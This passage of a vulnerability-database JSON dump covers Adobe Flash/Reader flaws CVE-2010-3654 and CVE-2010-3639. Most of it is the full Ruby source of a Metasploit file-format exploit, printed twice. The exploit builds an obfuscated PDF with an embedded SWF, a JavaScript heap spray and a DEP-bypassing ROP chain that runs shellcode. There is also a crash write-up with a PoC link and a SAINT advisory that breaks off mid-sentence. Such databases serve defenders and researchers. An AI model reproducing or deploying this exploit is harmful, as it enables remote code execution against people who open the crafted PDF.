rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16667/"}, {"lastseen": "2016-02-01T21:48:11", "description": "Adobe Flash - ActionIf Integer Denial of Service Vulnerability. CVE-2010-3639. Dos exploit for windows platform", "published": "2010-11-05T00:00:00", "type": "exploitdb", "title": "Adobe Flash - ActionIf Integer Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2010-11-05T00:00:00", "id": "EDB-ID:15426", "href": "https://www.exploit-db.com/exploits/15426/", "sourceData": "Adobe Flash Integer Overflow \r\nAuthor: Matthew Bergin\r\nDate: June 15, 2010\r\nVersions Affected: Flash10e.ocx v10.0.45.2\r\n\t\t Flash10c.ocx v10.0.32.18 r32\r\nRoot Cause: ActionScript, \"ActionIf\"\r\nAffect: Denial-of-Service, possible Command Execution\r\nCVE: CVE-2010-3639\r\nDesc: When Parsing an ActionIf ActionScript statement four args are passed\r\n to the function, an integer named i , a ubyte named ActionCode, a ushort\r\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \r\n smaller it will cause an Access Violation when reading data from a \r\n invalid memory address. The last 16-bits of the address are controlable\r\n with the size of the BranchOffset argument. Any data which is in a valid\r\n segment of memory near the controlled address can be read causing Memory\r\n Disclosure. This would be used well in combination with a memory corruption\r\n vulnerability in order to bypass ASLR. \r\n\r\n In doing my initial research I found a lot of interesting things along the way.\r\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\r\n the integer overflow in Flash10c while fuzzing SWF. I didnt fuzz it via a web\r\n browser but instead used a free application which uses the modules in a more\r\n direct manner. Flash10c is not able to be attacked via a browser as far as I\r\n have been able to tell. However, I have found during my research that Flash10e\r\n is loaded as a module when any Flash object is encountered. I am unsure as to\r\n if this is a configuration issue or not. In addition to this, while debugging\r\n this issue I found that both versions have a self-changing CRC which inhibits\r\n keeping break points set.\r\n\r\n Another interesting note is that when confirming the PoC on Flash Movie Player\r\n i noticed that if you open the file with the File -> Open drop down menu, the\r\n PoC will not hit the vulnerable code causing a crash. However, if you register\r\n the swf extension to Flash Movie Player and \"double-click\" the PoC file to run\r\n it, Flash Movie Player will hit the vulnerable code every time. \r\n\r\n The PoC code would be best embedded into HTML for remote attacks but can be\r\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\r\n into memory.\r\n\r\n\r\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\r\n\r\nCrash Details:\r\n\r\nAccess Violation\r\nException caught at 1009cb23 mov al,[eax+ecx]\r\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\r\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\r\n\r\nReversing:\r\n\r\nstruct SWFTAG Tag[7], value DoAction\r\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\r\nint i, value 0\r\nubyte ActionCode, value 157\r\nushort Length, value 2\r\nshort BranchOffset, value -305\r\n\r\nBranchOffset is located @ E6h-E7h\r\n\r\nPoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar)\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15426/"}], "metasploit": [{"lastseen": "2020-06-27T20:14:55", "description": "This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due to a hardcoded syscall number.\n", "published": "2010-11-01T22:34:13", "type": "metasploit", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_BUTTON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'Haifei Li', # PoC\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-3654'],\n ['OSVDB', '68932'],\n ['BID', '44504'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],\n ['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Oct 28 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n swf_data = make_swf()\n js_data = make_js(payload.encoded)\n\n # Create the pdf\n pdf = make_pdf(swf_data, js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n def make_swf\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-3654.swf\" )\n fd = File.open( path, \"rb\" )\n swf_data = fd.read(fd.stat.size)\n fd.close\n swf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx\n 0xcccccccc,\n 0xcccccccc,\n 0xc0c0c0c + 0x10,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << endobj\n\n # rich media configuration\n xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances [\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_flashplayer_button.rb"}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. \n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:B5657AFB338B1DE1878BED26F331E06E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "type": "saint", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. \n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user 